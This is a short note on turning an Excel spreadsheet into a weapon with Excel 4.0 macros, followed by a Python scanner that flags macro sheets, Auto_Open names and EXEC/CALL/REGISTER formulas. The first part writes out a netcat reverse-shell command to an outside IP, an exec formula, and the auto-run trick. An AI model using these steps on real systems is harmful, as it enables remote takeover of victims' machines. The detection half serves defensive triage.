XLM Macro 4.0

A Microsoft Excel spreadsheet can be weaponized by first inserting a new sheet of type "MS Excel 4.0 Macro".

shell.cmd:

C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe

We can then execute the command by typing the following into the cells:

=exec("c:\shell.cmd")
=halt()

Note that we need to rename the A1 cell to Auto_Open if we want the macros to fire as soon as the document is opened.

Opening the document and enabling macros pops a reverse shell.

Note that XLM macros allow using Win32 APIs, hence shellcode injection is also possible. See the original research link below for more info.
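
For triage on the receiving end, the three indicators this page relies on (a macro sheet, an Auto_Open defined name, an EXEC formula) can be checked statically. The Python below is an added example, not code from the original page; it handles only the OOXML (.xlsx/.xlsm) container, not legacy .xls, and its sample workbook is constructed and holds just the two parts the scanner reads.

```python
import io
import re
import zipfile

# EXEC is the function the page uses; CALL and REGISTER are the XLM
# functions for calling DLL exports (the Win32 API route the page mentions).
RISKY_FUNCS = re.compile(r"\b(EXEC|CALL|REGISTER)\s*\(", re.IGNORECASE)
# Accepts the name as typed in Excel and the "_xlnm."-prefixed stored form.
AUTO_OPEN = re.compile(
    r'<definedName[^>]*\bname="(?:_xlnm\.)?Auto_Open[^"]*"[^>]*>([^<]*)<', re.IGNORECASE)
FORMULA = re.compile(r"<f[^>]*>([^<]*)</f>")


def scan_workbook(data: bytes) -> dict:
    """Return XLM indicators found in an OOXML workbook given as bytes."""
    report = {"macro_sheets": [], "auto_open": [], "risky_formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower == "xl/workbook.xml":
                text = zf.read(name).decode("utf-8", "replace")
                report["auto_open"] += AUTO_OPEN.findall(text)
            elif lower.startswith("xl/macrosheets/") and lower.endswith(".xml"):
                report["macro_sheets"].append(name)
                text = zf.read(name).decode("utf-8", "replace")
                for formula in FORMULA.findall(text):
                    if RISKY_FUNCS.search(formula):
                        report["risky_formulas"].append((name, formula))
    return report


def build_sample() -> bytes:
    """Constructed sample mirroring the page's macro sheet (not a full workbook)."""
    workbook = ('<workbook><definedNames>'
                '<definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>'
                '</definedNames></workbook>')
    sheet = ('<xm:macrosheet><sheetData>'
             '<row r="1"><c r="A1"><f>EXEC("c:\\shell.cmd")</f></c></row>'
             '<row r="2"><c r="A2"><f>HALT()</f></c></row></sheetData></xm:macrosheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/macrosheets/sheet1.xml", sheet)
    return buf.getvalue()


if __name__ == "__main__":
    for key, value in scan_workbook(build_sample()).items():
        print(key, value)
```

A workbook that reports a macro sheet together with an Auto_Open target pointing into it is worth quarantining before anyone clicks "Enable Content", whatever the formulas contain.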
